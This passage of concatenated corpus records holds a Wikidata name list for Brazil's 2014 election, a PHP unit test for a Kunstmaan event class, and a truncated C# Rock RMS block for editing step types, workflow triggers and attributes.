"Elecciones generales de Brasil de 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt-br", "name": "eleições gerais no Brasil em 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "el", "name": "Βραζιλιάνικες γενικές εκλογές 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ar", "name": "انتخابات البرازيل الرئاسية 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "he", "name": "הבחירות הכלליות בברזיל 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ja", "name": "2014年ブラジル大統領選挙", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ur", "name": "برازیل کے عام انتخابات، 2014ء", "note": "multilingual", "source": "wikidata-label" }, { "lang": "ast", "name": "Eleiciones presidenciales de Brasil de 2014", "note": "multilingual", "source": "wikidata-label" }, { "lang": "pt", "name": "eleições gerais do Brasil de 2014", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "eleições gerais do Brasil em 2014", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "eleições gerais no Brasil de 2014", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "eleições gerais brasileiras de 2014", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt", "name": "eleições gerais brasileiras em 2014", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt-br", "name": "eleições gerais do Brasil de 2014", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt-br", "name": "eleições gerais do Brasil em 2014", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt-br", "name": "eleições gerais no Brasil de 2014", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt-br", "name": "eleições gerais brasileiras de 2014", "note": "multilingual", "source": "wikidata-alias" }, { "lang": "pt-br", "name": "eleições gerais brasileiras em 2014", "note": "multilingual", "source": "wikidata-alias" } ], "dates": [ "2014-10-05", "2014-10-26" ], "follows": "Brazilian presidential election, 2010", "followed_by": "Brazilian general election, 2018", "successful_candidates": [ "Dilma Rousseff" ] } }
{ "pile_set_name": "Github" }
<?php namespace Kunstmaan\NodeBundle\Tests\Event; use Kunstmaan\NodeBundle\Entity\HasNodeInterface; use Kunstmaan\NodeBundle\Entity\Node; use Kunstmaan\NodeBundle\Entity\NodeTranslation; use Kunstmaan\NodeBundle\Entity\NodeVersion; use Kunstmaan\NodeBundle\Event\CopyPageTranslationNodeEvent; use PHPUnit\Framework\TestCase; /** * Class ConfigureActionMenuEventTest */ class CopyPageTranslationNodeEventTest extends TestCase { public function testGetSet() { /** @var Node $node */ $node = $this->createMock(Node::class); /** @var NodeTranslation $nodeTranslation */ $nodeTranslation = $this->createMock(NodeTranslation::class); /** @var NodeVersion $nodeVersion */ $nodeVersion = $this->createMock(NodeVersion::class); $page = $this->createMock(HasNodeInterface::class); $event = new CopyPageTranslationNodeEvent($node, $nodeTranslation, $nodeVersion, $page, $nodeTranslation, $nodeVersion, $page, 'nl'); $this->assertEquals('nl', $event->getOriginalLanguage()); $this->assertInstanceOf(NodeTranslation::class, $event->getOriginalNodeTranslation()); $this->assertInstanceOf(\get_class($page), $event->getOriginalPage()); $this->assertInstanceOf(NodeVersion::class, $event->getOriginalNodeVersion()); $event->setOriginalLanguage('nl'); $event->setOriginalNodeTranslation($nodeTranslation); $event->setOriginalNodeVersion($nodeVersion); $event->setOriginalPage($page); $this->assertEquals('nl', $event->getOriginalLanguage()); $this->assertInstanceOf(NodeTranslation::class, $event->getOriginalNodeTranslation()); $this->assertInstanceOf(\get_class($page), $event->getOriginalPage()); $this->assertInstanceOf(NodeVersion::class, $event->getOriginalNodeVersion()); } }
{ "pile_set_name": "Github" }
// <copyright> // Copyright by the Spark Development Network // // Licensed under the Rock Community License (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.rockrms.com/license // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. // </copyright> // using System; using System.Collections.Generic; using System.ComponentModel; using System.Data.Entity; using System.Linq; using System.Web.UI; using System.Web.UI.WebControls; using Newtonsoft.Json; using Rock; using Rock.Attribute; using Rock.Chart; using Rock.Constants; using Rock.Data; using Rock.Model; using Rock.Security; using Rock.Utility; using Rock.Web; using Rock.Web.Cache; using Rock.Web.UI; using Rock.Web.UI.Controls; using Attribute = Rock.Model.Attribute; namespace RockWeb.Blocks.Steps { [DisplayName( "Step Type Detail" )] [Category( "Steps" )] [Description( "Displays the details of the given Step Type for editing." )] #region Block Attributes [BooleanField ( "Show Chart", Key = AttributeKey.ShowChart, DefaultValue = "true", Order = 0 )] [DefinedValueField ( Rock.SystemGuid.DefinedType.CHART_STYLES, "Chart Style", Key = AttributeKey.ChartStyle, DefaultValue = Rock.SystemGuid.DefinedValue.CHART_STYLE_ROCK, Order = 1 )] [SlidingDateRangeField ( "Default Chart Date Range", Key = AttributeKey.SlidingDateRange, DefaultValue = "Current||Year||", EnabledSlidingDateRangeTypes = "Last,Previous,Current,DateRange", Order = 2 )] [CategoryField( "Data View Categories", Key = AttributeKey.DataViewCategories, Description = "The categories from which the Audience and Autocomplete data view options can be selected. If empty, all data views will be available.", AllowMultiple = true, EntityTypeName = "Rock.Model.DataView", EntityTypeQualifierColumn = "", EntityTypeQualifierValue = "", IsRequired = false, DefaultValue = "", Category = "", Order = 7 )] [LinkedPage( name: "Bulk Entry Page", description: "The page to use for bulk entry of steps data", required: false, order: 8, key: AttributeKey.BulkEntryPage )] #endregion Block Attributes public partial class StepTypeDetail : RockBlock, IDetailBlock { #region Attribute Keys /// <summary> /// Keys to use for Block Attributes /// </summary> private static class AttributeKey { /// <summary> /// The show chart /// </summary> public const string ShowChart = "ShowChart"; /// <summary> /// The chart style /// </summary> public const string ChartStyle = "ChartStyle"; /// <summary> /// The sliding date range /// </summary> public const string SlidingDateRange = "SlidingDateRange"; /// <summary> /// The data view categories /// </summary> public const string DataViewCategories = "DataViewCategories"; /// <summary> /// The bulk entry page /// </summary> public const string BulkEntryPage = "BulkEntryPage"; } #endregion Attribute Keys #region Page Parameter Keys /// <summary> /// Keys to use for Page Parameters /// </summary> private static class PageParameterKey { /// <summary> /// The step type identifier /// </summary> public const string StepTypeId = "StepTypeId"; /// <summary> /// The step program identifier /// </summary> public const string StepProgramId = "ProgramId"; } #endregion Page Parameter Keys #region Properties private List<Attribute> AttributesState { get; set; } private List<StepWorkflowTriggerViewModel> WorkflowsState { get; set; } #endregion #region Private Variables private int _stepProgramId = 0; private int _stepTypeId = 0; private RockContext _dataContext = null; private bool _blockContextIsValid = false; #endregion Private Variables #region Control Methods /// <summary> /// Raises the <see cref="E:System.Web.UI.Control.Init" /> event. /// </summary> /// <param name="e">An <see cref="T:System.EventArgs" /> object that contains the event data.</param> protected override void OnInit( EventArgs e ) { base.OnInit( e ); InitializeBlockNotification( nbBlockStatus, pnlDetails ); InitializeSettingsNotification( upStepType ); _blockContextIsValid = InitializeBlockContext(); if ( !_blockContextIsValid ) { return; } InitializeChartScripts(); InitializeChartFilter(); dvpAutocomplete.EntityTypeId = EntityTypeCache.Get( typeof( Rock.Model.Person ) ).Id; dvpAutocomplete.CategoryGuids = GetAttributeValue( AttributeKey.DataViewCategories ).SplitDelimitedValues().AsGuidList(); dvpAudience.EntityTypeId = EntityTypeCache.Get( typeof( Rock.Model.Person ) ).Id; dvpAudience.CategoryGuids = GetAttributeValue( AttributeKey.DataViewCategories ).SplitDelimitedValues().AsGuidList(); bool editAllowed = IsUserAuthorized( Authorization.EDIT ); InitializeAttributesGrid( editAllowed ); InitializeWorkflowGrid( editAllowed ); btnDelete.Attributes["onclick"] = string.Format( "javascript: return Rock.dialogs.confirmDelete(event, '{0}', 'This will also delete the associated step participants.');", StepType.FriendlyTypeName ); btnSecurity.EntityTypeId = EntityTypeCache.Get( typeof( Rock.Model.StepType ) ).Id; } /// <summary> /// Raises the <see cref="E:System.Web.UI.Control.Load" /> event. /// </summary> /// <param name="e">The <see cref="T:System.EventArgs" /> object that contains the event data.</param> protected override void OnLoad( EventArgs e ) { base.OnLoad( e ); if ( !_blockContextIsValid ) { return; } if ( !Page.IsPostBack ) { ShowDetail( _stepTypeId ); } else { RefreshChart(); } } /// <summary> /// Restores the view-state information from a previous user control request that was saved by the <see cref="M:System.Web.UI.UserControl.SaveViewState" /> method. /// </summary> /// <param name="savedState">An <see cref="T:System.Object" /> that represents the user control state to be restored.</param> protected override void LoadViewState( object savedState ) { base.LoadViewState( savedState ); LoadAttributesViewState(); var json = ViewState["WorkflowsState"] as string ?? string.Empty; this.WorkflowsState = JsonConvert.DeserializeObject<List<StepWorkflowTriggerViewModel>>( json ) ?? new List<StepWorkflowTriggerViewModel>(); } /// <summary> /// Saves any user control view-state changes that have occurred since the last page postback. /// </summary> /// <returns> /// Returns the user control's current view state. If there is no view state associated with the control, it returns null. /// </returns> protected override object SaveViewState() { var jsonSetting = new JsonSerializerSettings { ReferenceLoopHandling = ReferenceLoopHandling.Ignore, NullValueHandling = NullValueHandling.Ignore }; var json = JsonConvert.SerializeObject( WorkflowsState, Formatting.None, jsonSetting ); SaveAttributesViewState( jsonSetting ); ViewState["WorkflowsState"] = json; return base.SaveViewState(); } /// <summary> /// Returns breadcrumbs specific to the block that should be added to navigation /// based on the current page reference. This function is called during the page's /// oninit to load any initial breadcrumbs /// </summary> /// <param name="pageReference">The page reference.</param> /// <returns></returns> public override List<BreadCrumb> GetBreadCrumbs( PageReference pageReference ) { var breadCrumbs = new List<BreadCrumb>(); int? stepTypeId = PageParameter( pageReference, PageParameterKey.StepTypeId ).AsIntegerOrNull(); if ( stepTypeId != null ) { var dataContext = GetDataContext(); var stepType = new StepTypeService( dataContext ).Get( stepTypeId.Value ); if ( stepType != null ) { breadCrumbs.Add( new BreadCrumb( stepType.Name, pageReference ) ); } else { breadCrumbs.Add( new BreadCrumb( "New Step Type", pageReference ) ); } } else { // don't show a breadcrumb if we don't have a pageparam to work with } return breadCrumbs; } /// <summary> /// Navigate to the step program page /// </summary> private void GoToStepProgramPage() { NavigateToParentPage( new Dictionary<string, string> { { PageParameterKey.StepProgramId, _stepProgramId.ToString() } } ); } #endregion #region Events #region Control Events /// <summary> /// Handles the Click event of the btnBulkEntry control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param> protected void btnBulkEntry_Click( object sender, EventArgs e ) { var stepType = GetStepType(); var queryParams = new Dictionary<string, string>(); if ( stepType != null ) { queryParams[PageParameterKey.StepTypeId] = stepType.Id.ToString(); } NavigateToLinkedPage( AttributeKey.BulkEntryPage, queryParams ); } /// <summary> /// Refresh the Steps Activity Chart. /// </summary> /// <param name="sender"></param> /// <param name="e"></param> protected void btnRefreshChart_Click( object sender, EventArgs e ) { RefreshChart(); } /// <summary> /// Handles the Click event of the btnEdit control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="EventArgs" /> instance containing the event data.</param> protected void btnEdit_Click( object sender, EventArgs e ) { var stepType = GetStepType(); ShowEditDetails( stepType ); } /// <summary> /// Handles the Click event of the btnDelete control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param> protected void btnDelete_Click( object sender, EventArgs e ) { DeleteRecord(); } /// <summary> /// Handles the Click event of the btnSave control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="EventArgs" /> instance containing the event data.</param> protected void btnSave_Click( object sender, EventArgs e ) { var recordId = SaveRecord(); if ( recordId <= 0 ) { return; } // Update the query string for this page and reload. var qryParams = new Dictionary<string, string>(); qryParams[PageParameterKey.StepTypeId] = recordId.ToString(); NavigateToPage( RockPage.Guid, qryParams ); } /// <summary> /// Save the current record. /// </summary> /// <returns>The Id of the new record, or -1 if the process could not be completed.</returns> private int SaveRecord() { StepType stepType; var rockContext = GetDataContext(); var stepTypeService = new StepTypeService( rockContext ); var stepWorkflowService = new StepWorkflowService( rockContext ); var stepWorkflowTriggerService = new StepWorkflowTriggerService( rockContext ); int stepTypeId = int.Parse( hfStepTypeId.Value ); if ( stepTypeId == 0 ) { stepType = new StepType(); stepType.StepProgramId = _stepProgramId; stepTypeService.Add( stepType ); } else { stepType = stepTypeService.Queryable() .Include( x => x.StepWorkflowTriggers ) .Where( c => c.Id == stepTypeId ) .FirstOrDefault(); } // Workflow Triggers: Remove deleted triggers. var uiWorkflows = WorkflowsState.Select( l => l.Guid ); var deletedTriggers = stepType.StepWorkflowTriggers.Where( l => !uiWorkflows.Contains( l.Guid ) ).ToList(); foreach ( var trigger in deletedTriggers ) { // Remove the Step workflows associated with this trigger. var stepWorkflows = stepWorkflowService.Queryable().Where( w => w.StepWorkflowTriggerId == trigger.Id ); foreach ( var requestWorkflow in stepWorkflows ) { stepWorkflowService.Delete( requestWorkflow ); } // Remove the trigger. stepType.StepWorkflowTriggers.Remove( trigger ); stepWorkflowTriggerService.Delete( trigger ); } // Workflow Triggers: Update modified triggers. foreach ( var stateTrigger in WorkflowsState ) { var workflowTrigger = stepType.StepWorkflowTriggers.Where( a => a.Guid == stateTrigger.Guid ).FirstOrDefault(); if ( workflowTrigger == null ) { workflowTrigger = new StepWorkflowTrigger(); workflowTrigger.StepProgramId = stepType.StepProgramId; stepType.StepWorkflowTriggers.Add( workflowTrigger ); } workflowTrigger.Guid = stateTrigger.Guid; workflowTrigger.WorkflowTypeId = stateTrigger.WorkflowTypeId; workflowTrigger.TriggerType = stateTrigger.TriggerType; workflowTrigger.TypeQualifier = stateTrigger.TypeQualifier; workflowTrigger.WorkflowTypeId = stateTrigger.WorkflowTypeId; workflowTrigger.WorkflowName = stateTrigger.WorkflowTypeName; } // Update Basic properties stepType.Name = tbName.Text; stepType.IsActive = cbIsActive.Checked; stepType.Description = tbDescription.Text; stepType.IconCssClass = tbIconCssClass.Text; stepType.HighlightColor = cpHighlight.Value; stepType.ShowCountOnBadge = cbShowBadgeCount.Checked; stepType.HasEndDate = cbHasDuration.Checked; stepType.AllowMultiple = cbAllowMultiple.Checked; // Update Prerequisites var uiPrerequisiteStepTypeIds = cblPrerequsities.SelectedValuesAsInt; var stepTypes = stepTypeService.Queryable().ToList(); var removePrerequisiteStepTypes = stepType.StepTypePrerequisites.Where( x => !uiPrerequisiteStepTypeIds.Contains( x.PrerequisiteStepTypeId ) ).ToList(); var prerequisiteService = new StepTypePrerequisiteService( rockContext ); foreach ( var prerequisiteStepType in removePrerequisiteStepTypes ) { stepType.StepTypePrerequisites.Remove( prerequisiteStepType ); prerequisiteService.Delete( prerequisiteStepType ); } var existingPrerequisiteStepTypeIds = stepType.StepTypePrerequisites.Select( x => x.PrerequisiteStepTypeId ).ToList(); var addPrerequisiteStepTypeIds = stepTypes.Where( x => uiPrerequisiteStepTypeIds.Contains( x.Id ) && !existingPrerequisiteStepTypeIds.Contains( x.Id ) ) .Select( x => x.Id ) .ToList(); foreach ( var prerequisiteStepTypeId in addPrerequisiteStepTypeIds ) { var newPrerequisite = new StepTypePrerequisite(); newPrerequisite.StepTypeId = stepType.Id; newPrerequisite.PrerequisiteStepTypeId = prerequisiteStepTypeId; stepType.StepTypePrerequisites.Add( newPrerequisite ); } // Validate Prerequisites. // This is necessary because other Step Types may have been modified after this record edit was started. if ( _stepTypeId > 0 ) { var eligibleStepTypeIdList = stepTypeService.GetEligiblePrerequisiteStepTypes( _stepTypeId ).Select(x => x.Id).ToList(); foreach ( var prerequisite in stepType.StepTypePrerequisites ) { if ( !eligibleStepTypeIdList.Contains( prerequisite.PrerequisiteStepTypeId ) ) { var prerequisiteStepType = stepTypeService.Get( prerequisite.PrerequisiteStepTypeId ); cvStepType.IsValid = false; cvStepType.ErrorMessage = string.Format( "This Step Type cannot have prerequisite \"{0}\" because it is already a prerequisite of that Step Type.", prerequisiteStepType.Name ); return 0; } } } // Update Advanced Settings stepType.AutoCompleteDataViewId = dvpAutocomplete.SelectedValueAsId(); stepType.AudienceDataViewId = dvpAudience.SelectedValueAsId(); stepType.AllowManualEditing = cbAllowEdit.Checked; stepType.CardLavaTemplate = ceCardTemplate.Text; if ( !stepType.IsValid ) { // Controls will render the error messages return -1; } // Save the Step Type and the associated Attributes. rockContext.WrapTransaction( () => { rockContext.SaveChanges(); Helper.SaveAttributeEdits( AttributesState, new Step().TypeId, "StepTypeId", stepType.Id.ToString(), rockContext ); } ); return stepType.Id; } /// <summary> /// Handles the Click event of the btnCancel control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="EventArgs" /> instance containing the event data.</param> protected void btnCancel_Click( object sender, EventArgs e ) { if ( hfStepTypeId.Value.Equals( "0" ) ) { GoToStepProgramPage(); } else { ShowReadonlyDetails( GetStepType() ); } } /// <summary> /// Handles the BlockUpdated event of the control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param> protected void Block_BlockUpdated( object sender, EventArgs e ) { this.NavigateToCurrentPageReference(); } #endregion #region StepWorkflow Events /// <summary> /// Handles the SaveClick event of the dlgStepWorkflow control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param> protected void dlgStepWorkflow_SaveClick( object sender, EventArgs e ) { SaveWorkflowProperties(); } /// <summary> /// Handles the Delete event of the gWorkflows control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="RowEventArgs"/> instance containing the event data.</param> protected void gWorkflows_Delete( object sender, RowEventArgs e ) { Guid rowGuid = ( Guid ) e.RowKeyValue; var workflowTypeStateObj = WorkflowsState.Where( g => g.Guid.Equals( rowGuid ) ).FirstOrDefault(); if ( workflowTypeStateObj != null ) { WorkflowsState.Remove( workflowTypeStateObj ); } BindStepWorkflowsGrid(); } /// <summary> /// Handles the GridRebind event of the gWorkflows control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param> private void gWorkflows_GridRebind( object sender, EventArgs e ) { BindStepWorkflowsGrid(); } /// <summary> /// Handles the Edit event of the gWorkflows control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="RowEventArgs"/> instance containing the event data.</param> protected void gWorkflows_Edit( object sender, RowEventArgs e ) { Guid stepWorkflowGuid = ( Guid ) e.RowKeyValue; gWorkflows_ShowEdit( stepWorkflowGuid ); } /// <summary> /// Show the edit dialog for the specified Workflow Trigger. /// </summary> /// <param name="triggerGuid">The workflow trigger unique identifier.</param> protected void gWorkflows_ShowEdit( Guid triggerGuid ) { ShowWorkflowTriggerPropertiesDialog( triggerGuid ); } /// <summary> /// Handles the Add event of the gWorkflows control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param> private void gWorkflows_Add( object sender, EventArgs e ) { gWorkflows_ShowEdit( Guid.Empty ); } /// <summary> /// Handles the SelectedIndexChanged event of the ddlTriggerType control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param> protected void ddlTriggerType_SelectedIndexChanged( object sender, EventArgs e ) { UpdateTriggerQualifiers(); } /// <summary> /// Show the edit dialog for the specified Workflow Trigger. /// </summary> /// <param name="triggerGuid">The workflow trigger unique identifier.</param> private void ShowWorkflowTriggerPropertiesDialog( Guid triggerGuid ) { var workflowTrigger = WorkflowsState.FirstOrDefault( l => l.Guid.Equals( triggerGuid ) ); if ( workflowTrigger != null ) { wpWorkflowType.SetValue( workflowTrigger.WorkflowTypeId ); ddlTriggerType.SelectedValue = workflowTrigger.TriggerType.ToString(); } else { // Set default values wpWorkflowType.SetValue( null ); ddlTriggerType.SelectedValue = StepWorkflowTrigger.WorkflowTriggerCondition.IsComplete.ToString(); } hfAddStepWorkflowGuid.Value = triggerGuid.ToString(); ShowDialog( "StepWorkflows", true ); UpdateTriggerQualifiers(); } /// <summary> /// Save changes to the Workflow Trigger currently displayed in the Workflow properties dialog. /// </summary> private void SaveWorkflowProperties() { StepWorkflowTriggerViewModel workflowTrigger = null; var guid = hfAddStepWorkflowGuid.Value.AsGuid(); if ( !guid.IsEmpty() ) { workflowTrigger = WorkflowsState.FirstOrDefault( l => l.Guid.Equals( guid ) ); } if ( workflowTrigger == null ) { workflowTrigger = new StepWorkflowTriggerViewModel(); workflowTrigger.Guid = Guid.NewGuid(); WorkflowsState.Add( workflowTrigger ); } workflowTrigger.WorkflowTypeId = wpWorkflowType.SelectedValueAsId().Value; workflowTrigger.TriggerType = ddlTriggerType.SelectedValueAsEnum<StepWorkflowTrigger.WorkflowTriggerCondition>(); var qualifierSettings = new StepWorkflowTrigger.StatusChangeTriggerSettings { FromStatusId = ddlPrimaryQualifier.SelectedValue.AsIntegerOrNull(), ToStatusId = ddlSecondaryQualifier.SelectedValue.AsIntegerOrNull() }; workflowTrigger.TypeQualifier = qualifierSettings.ToSelectionString(); var dataContext = GetDataContext(); var workflowTypeService = new WorkflowTypeService( dataContext ); var workflowTypeId = wpWorkflowType.SelectedValueAsId().GetValueOrDefault( 0 ); var workflowType = workflowTypeService.Queryable().AsNoTracking().FirstOrDefault( x => x.Id == workflowTypeId ); workflowTrigger.WorkflowTypeName = ( workflowType == null ) ? "(Unknown)" : workflowType.Name; BindStepWorkflowsGrid(); HideDialog(); } /// <summary> /// Updates the trigger qualifiers. /// </summary> private void UpdateTriggerQualifiers() { var dataContext = GetDataContext(); var workflowTrigger = WorkflowsState.FirstOrDefault( l => l.Guid.Equals( hfAddStepWorkflowGuid.Value.AsGuid() ) ); var sStepWorkflowTriggerType = ddlTriggerType.SelectedValueAsEnum<StepWorkflowTrigger.WorkflowTriggerCondition>(); if ( sStepWorkflowTriggerType == StepWorkflowTrigger.WorkflowTriggerCondition.StatusChanged ) { // Populate the selection lists for "To Status" and "From Status". var stepType = GetStepType(); var statusList = new StepStatusService( dataContext ).Queryable().Where( s => s.StepProgramId == stepType.StepProgramId ).ToList(); ddlPrimaryQualifier.Label = "From"; ddlPrimaryQualifier.Visible = true; ddlPrimaryQualifier.Items.Clear(); ddlPrimaryQualifier.Items.Add( new ListItem( string.Empty, string.Empty ) ); foreach ( var status in statusList ) { ddlPrimaryQualifier.Items.Add( new ListItem( status.Name, status.Id.ToString().ToUpper() ) ); } ddlSecondaryQualifier.Label = "To"; ddlSecondaryQualifier.Visible = true; ddlSecondaryQualifier.Items.Clear(); ddlSecondaryQualifier.Items.Add( new ListItem( string.Empty, string.Empty ) ); foreach ( var status in statusList ) { ddlSecondaryQualifier.Items.Add( new ListItem( status.Name, status.Id.ToString().ToUpper() ) ); } } else { ddlPrimaryQualifier.Visible = false; ddlPrimaryQualifier.Items.Clear(); ddlSecondaryQualifier.Visible = false; ddlSecondaryQualifier.Items.Clear(); } // Set the qualifier values. if ( workflowTrigger != null ) { if ( workflowTrigger.TriggerType == sStepWorkflowTriggerType ) { var qualifierSettings = new StepWorkflowTrigger.StatusChangeTriggerSettings( workflowTrigger.TypeQualifier ); ddlPrimaryQualifier.SelectedValue = qualifierSettings.FromStatusId.ToStringSafe(); ddlSecondaryQualifier.SelectedValue = qualifierSettings.ToStatusId.ToStringSafe(); } } } /// <summary> /// Binds the workflow triggers grid. /// </summary> private void BindStepWorkflowsGrid() { if ( WorkflowsState != null ) { SetStepWorkflowListOrder( WorkflowsState ); // Set the description for the trigger. var stepService = new StepWorkflowTriggerService( new RockContext() ); foreach ( var workflowTrigger in WorkflowsState ) { var qualifierSettings = new StepWorkflowTrigger.StatusChangeTriggerSettings( workflowTrigger.TypeQualifier ); workflowTrigger.TriggerDescription = stepService.GetTriggerSettingsDescription( workflowTrigger.TriggerType, qualifierSettings ); } gWorkflows.DataSource = WorkflowsState; } gWorkflows.DataBind(); } /// <summary> /// Sets the workflow triggers list order. /// </summary> /// <param name="stepWorkflowList">The workflow trigger list.</param> private void SetStepWorkflowListOrder( List<StepWorkflowTriggerViewModel> stepWorkflowList ) { if ( stepWorkflowList != null ) { if ( stepWorkflowList.Any() ) { stepWorkflowList.OrderBy( c => c.WorkflowTypeName ).ThenBy( c => c.TriggerType.ConvertToString() ).ToList(); } } } /// <summary> /// Configure the Workflow grid control. /// </summary> private void InitializeWorkflowGrid( bool showAdd ) { gWorkflows.DataKeyNames = new string[] { "Guid" }; gWorkflows.Actions.ShowAdd = showAdd; gWorkflows.Actions.AddClick += gWorkflows_Add; gWorkflows.GridRebind += gWorkflows_GridRebind; } #endregion #endregion #region Attributes Grid and Picker (Custom) /// <summary> /// Get the implementing type of the Attribute Definition. /// This is the type to which the attribute definition is attached, not the type with which the attribute values are associated. /// </summary> /// <returns></returns> private Type GetAttributeParentEntityType() { return typeof( StepType ); } /// <summary> /// Get the prompt shown in the Attribute Definition dialog for the current parent entity. /// </summary> /// <returns></returns> private string GetAttributeDefinitionDialogPrompt() { return string.Format( "Edit Attribute for Participants in Step Type \"{0}\"", tbName.Text ); } #endregion #region Attributes Grid and Picker (Common) // Code in this region should be capable of being reused in other blocks without modification. /// <summary> /// Save the Attribute Definition currently displayed in the properties dialog. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param> protected void SaveAttributeDefinition() { Rock.Model.Attribute attribute = new Rock.Model.Attribute(); edtAttributes.GetAttributeProperties( attribute ); // Controls will show warnings if ( !attribute.IsValid ) { return; } if ( AttributesState.Any( a => a.Guid.Equals( attribute.Guid ) ) ) { attribute.Order = AttributesState.Where( a => a.Guid.Equals( attribute.Guid ) ).FirstOrDefault().Order; AttributesState.RemoveEntity( attribute.Guid ); } else { attribute.Order = AttributesState.Any() ? AttributesState.Max( a => a.Order ) + 1 : 0; } AttributesState.Add( attribute ); ReOrderAttributes( AttributesState ); BindAttributesGrid(); HideDialog(); } /// <summary> /// Loads the state details. /// </summary> /// <param name="connectionType">Type of the connection.</param> /// <param name="rockContext">The rock context.</param> private void LoadAttributeDefinitions( int targetEntityTypeId, string targetEntityParentForeignKeyName, int targetEntityParentId ) { if ( targetEntityParentId == 0 ) { // If this is a new step type, then there are no attributes to load AttributesState = new List<Attribute>(); return; } var dataContext = this.GetDataContext(); var attributeService = new AttributeService( dataContext ); AttributesState = attributeService .GetByEntityTypeId( targetEntityTypeId, true ).AsQueryable() .Where( a => a.EntityTypeQualifierColumn.Equals( targetEntityParentForeignKeyName, StringComparison.OrdinalIgnoreCase ) && a.EntityTypeQualifierValue.Equals( targetEntityParentId.ToString() ) ) .OrderBy( a => a.Order ) .ThenBy( a => a.Name ) .ToList(); } /// <summary> /// Load the Attribute Definitions associated with the current record from ViewState. /// </summary> private void LoadAttributesViewState() { string json = ViewState["AttributesState"] as string; if ( string.IsNullOrWhiteSpace( json ) ) { AttributesState = new List<Attribute>(); } else { AttributesState = JsonConvert.DeserializeObject<List<Attribute>>( json ); } } /// <summary> /// Save the Attribute Definitions associated with the current record into ViewState. /// </summary> private void SaveAttributesViewState( JsonSerializerSettings jsonSetting ) { ViewState["AttributesState"] = JsonConvert.SerializeObject( AttributesState, Formatting.None, jsonSetting ); } /// <summary> /// Set the properties of the Attributes grid. /// </summary> /// <param name="showAdd"></param> private void InitializeAttributesGrid( bool showAdd ) { gAttributes.DataKeyNames = new string[] { "Guid" }; gAttributes.AllowPaging = false; gAttributes.DisplayType = GridDisplayType.Light; gAttributes.ShowConfirmDeleteDialog = false; gAttributes.EmptyDataText = Server.HtmlEncode( None.Text ); gAttributes.Actions.ShowAdd = showAdd; gAttributes.Actions.AddClick += gAttributes_Add; gAttributes.GridRebind += gAttributes_GridRebind; gAttributes.GridReorder += gAttributes_GridReorder; } /// <summary> /// Handles the Add event of the gAttributes control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="EventArgs" /> instance containing the event data.</param> protected void gAttributes_Add( object sender, EventArgs e ) { gAttributes_ShowEdit( Guid.Empty ); } /// <summary> /// Handles the Edit event of the gAttributes control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="RowEventArgs" /> instance containing the event data.</param> protected void gAttributes_Edit( object sender, RowEventArgs e ) { var attributeGuid = ( Guid ) e.RowKeyValue; gAttributes_ShowEdit( attributeGuid ); } /// <summary> /// Shows the edit attribute dialog. /// </summary> /// <param name="attributeGuid">The attribute unique identifier.</param> protected void gAttributes_ShowEdit( Guid attributeGuid ) { var entityType = GetAttributeParentEntityType(); var prompt = GetAttributeDefinitionDialogPrompt(); this.ShowAttributeDefinitionDialog( attributeGuid, entityType, prompt ); } /// <summary> /// Handles the GridReorder event of the gAttributes control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="GridReorderEventArgs"/> instance containing the event data.</param> protected void gAttributes_GridReorder( object sender, GridReorderEventArgs e ) { SortAttributes( AttributesState, e.OldIndex, e.NewIndex ); BindAttributesGrid(); } /// <summary> /// Handles the Delete event of the gAttributes control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="RowEventArgs" /> instance containing the event data.</param> /// <exception cref="System.NotImplementedException"></exception> protected void gAttributes_Delete( object sender, RowEventArgs e ) { var attributeGuid = ( Guid ) e.RowKeyValue; AttributesState.RemoveEntity( attributeGuid ); BindAttributesGrid(); } /// <summary> /// Handles the GridRebind event of the gAttributes control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="EventArgs" /> instance containing the event data.</param> protected void gAttributes_GridRebind( object sender, EventArgs e ) { BindAttributesGrid(); } /// <summary> /// Show the Attribute Definition Properties Dialog. /// </summary> private void ShowAttributeDefinitionDialog( Guid attributeGuid, Type attachToEntityType, 